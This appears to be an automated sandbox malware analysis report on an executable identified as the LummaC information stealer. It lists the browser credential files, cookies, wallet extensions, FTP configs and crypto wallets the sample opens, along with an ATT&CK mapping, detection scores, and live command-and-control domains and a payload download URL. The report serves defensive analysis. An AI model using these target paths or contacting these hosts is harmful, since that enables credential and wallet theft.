Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1597829853.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1597724019.00000000014E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0zBsv1tnt4.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Masquerading	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	45 Virtualization/Sandbox Evasion	LSASS Memory	851 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	45 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0zBsv1tnt4.exe	53%	Virustotal		Browse
0zBsv1tnt4.exe	58%	ReversingLabs	Win32.Infostealer.Tinba
0zBsv1tnt4.exe	100%	Avira	TR/Crypt.TPM.Gen
0zBsv1tnt4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://crl.microsoft2_	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeGd	0%	Avira URL Cloud	safe
http://185.215.113.16/z	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeeWebKit/537.36	0%	Avira URL Cloud	safe
https://mindhandru.buzz:443/api;WU	0%	Avira URL Cloud	safe
https://mindhandru.buzz/s	0%	Avira URL Cloud	safe
https://mindhandru.buzz/==	0%	Avira URL Cloud	safe
https://mindhandru.buzz/DataA4	0%	Avira URL Cloud	safe
https://mindhandru.buzz/aB	0%	Avira URL Cloud	safe
https://mindhandru.buzz/Cl	0%	Avira URL Cloud	safe
https://mindhandru.buzz/wK	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeSd	0%	Avira URL Cloud	safe
https://mindhandru.buzz/P)	0%	Avira URL Cloud	safe
https://mindhandru.buzz:443/apiz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/tC	0%	Avira URL Cloud	safe
https://mindhandru.buzz/d	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	142.250.181.68	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
mindhandru.buzz	104.21.11.101	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
scentniej.buzz	false	high
hummskitnj.buzz	false	high
mindhandru.buzz	false	high
https://mindhandru.buzz/api	false	high
rebuildeso.buzz	false	high
appliacnesot.buzz	false	high
screwamusresz.buzz	false	high
cashfuzysao.buzz	false	high
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	false	high
inherineau.buzz	false	high
prisonyfork.buzz	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf	chromecache_112.6.dr	false		high
https://duckduckgo.com/chrome_newtab	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft2_	0zBsv1tnt4.exe, 00000000.00000003.1510632934.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686542592.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1643183119.00000000014CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/	chromecache_112.6.dr	false		high
https://www.linkedin.com/cws/share?url=$	chromecache_121.6.dr, chromecache_101.6.dr	false		high
http://185.215.113.16/O	0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	0zBsv1tnt4.exe, 00000000.00000003.1567232573.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Youssef1313	chromecache_112.6.dr	false		high
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://aka.ms/msignite_docs_banner	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9	chromecache_101.6.dr	false		high
http://polymer.github.io/AUTHORS.txt	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_112.6.dr	false		high
https://mindhandru.buzz:443/api	0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000003.1597724019.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1597829853.0000000001501000.00000004.00000020.00020000.00000000.sdmp	false		high
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_112.6.dr	false		high
https://mindhandru.buzz/Cl	0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1591109396.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1598062166.0000000005B6C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	0zBsv1tnt4.exe, 00000000.00000003.1565704916.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pshelpmechoose	chromecache_121.6.dr, chromecache_101.6.dr	false		high
https://aka.ms/feedback/report?space=61	chromecache_112.6.dr, chromecache_89.6.dr, chromecache_122.6.dr	false		high
http://185.215.113.16/off/def.exeGd	0zBsv1tnt4.exe, 00000000.00000002.1871025265.0000000001489000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/z	0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
